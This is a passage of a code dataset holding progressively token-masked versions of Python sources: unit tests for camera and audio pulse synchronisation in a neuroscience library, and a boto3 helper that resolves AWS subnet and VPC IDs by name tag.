audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n <function token>\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<code token>\n" ]
false
65
767c0e6d956701fcedddb153b6c47f404dec535a
import boto3 class NetworkLookup: def __init__(self): self.loaded = 0 self.subnets = {} self.vpcs = {} def load(self): if self.loaded: return client = boto3.client('ec2') # load subnets subnets_r = client.describe_subnets() subnets_list = subnets_r['Subnets'] while 'NextToken' in subnets_r: subnets_r = client.get_subnets(NextToken=subnets_r['NextToken']) subnets_list.extend(subnets_r['Subnets']) for subnet in subnets_list: name = None if 'Tags' in subnet: for tag in subnet['Tags']: if tag['Key'] == 'Name': name = tag['Value'] if name is not None: self.subnets[name] = subnet['SubnetId'] # load vpcs vpcs_r = client.describe_vpcs() vpcs_list = vpcs_r['Vpcs'] while 'NextToken' in vpcs_r: vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken']) vpcs_list.extend(vpcs_r['Subnets']) for vpc in vpcs_list: name = None if 'Tags' in vpc: for tag in vpc['Tags']: if tag['Key'] == 'Name': name = tag['Value'] if name is not None: self.vpcs[name] = vpc['VpcId'] def get_subnets(self, environment_name, subnetname): self.load() return list(map( lambda x: self.subnets[x] , filter(lambda x: x.startswith(f"{environment_name}{subnetname}"), self.subnets) )) nl = NetworkLookup() def replace_subnets(value, parameters): if isinstance(value, str) and value.startswith('CfHl.Subnet'): parts = value.split('.') if len(parts) == 3: subnet_class = parts[2] environment_name = parameters['EnvironmentName'] subnets = nl.get_subnets(environment_name, subnet_class) if parts[1] == 'Subnets': return subnets elif parts[1] == 'Subnet': if subnets: return subnets[0] return value def replace_vpc(value, parameters): if isinstance(value, str) and value.startswith('CfHl.Vpc'): nl.load() parts = value.split('.') environment_name = parameters['EnvironmentName'] if len(parts) == 3: prop = parts[2] if prop == 'Id': vpcs = nl.vpcs if f"{environment_name}-vpc" in vpcs: return vpcs[f"{environment_name}-vpc"] return value def replace_network(value, parameters): value = replace_subnets(value, parameters) value = replace_vpc(value, parameters) return value if __name__ == '__main__': print(replace_network('CfHl.Subnets.Public',{'EnvironmentName':'dev'})) print(replace_network('CfHl.Subnet.Public0',{'EnvironmentName':'dev'})) print(replace_network('CfHl.Vpc.Id',{'EnvironmentName':'dev'}))
[ "import boto3\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n\n client = boto3.client('ec2')\n # load subnets\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n\n # load vpcs\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map( lambda x: self.subnets[x] ,\n filter(lambda x: x.startswith(f\"{environment_name}{subnetname}\"), self.subnets)\n ))\n\nnl = NetworkLookup()\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f\"{environment_name}-vpc\" in vpcs:\n return vpcs[f\"{environment_name}-vpc\"]\n return value\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public',{'EnvironmentName':'dev'}))\n print(replace_network('CfHl.Subnet.Public0',{'EnvironmentName':'dev'}))\n print(replace_network('CfHl.Vpc.Id',{'EnvironmentName':'dev'}))\n", "import boto3\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\nnl = NetworkLookup()\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\nnl = NetworkLookup()\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = 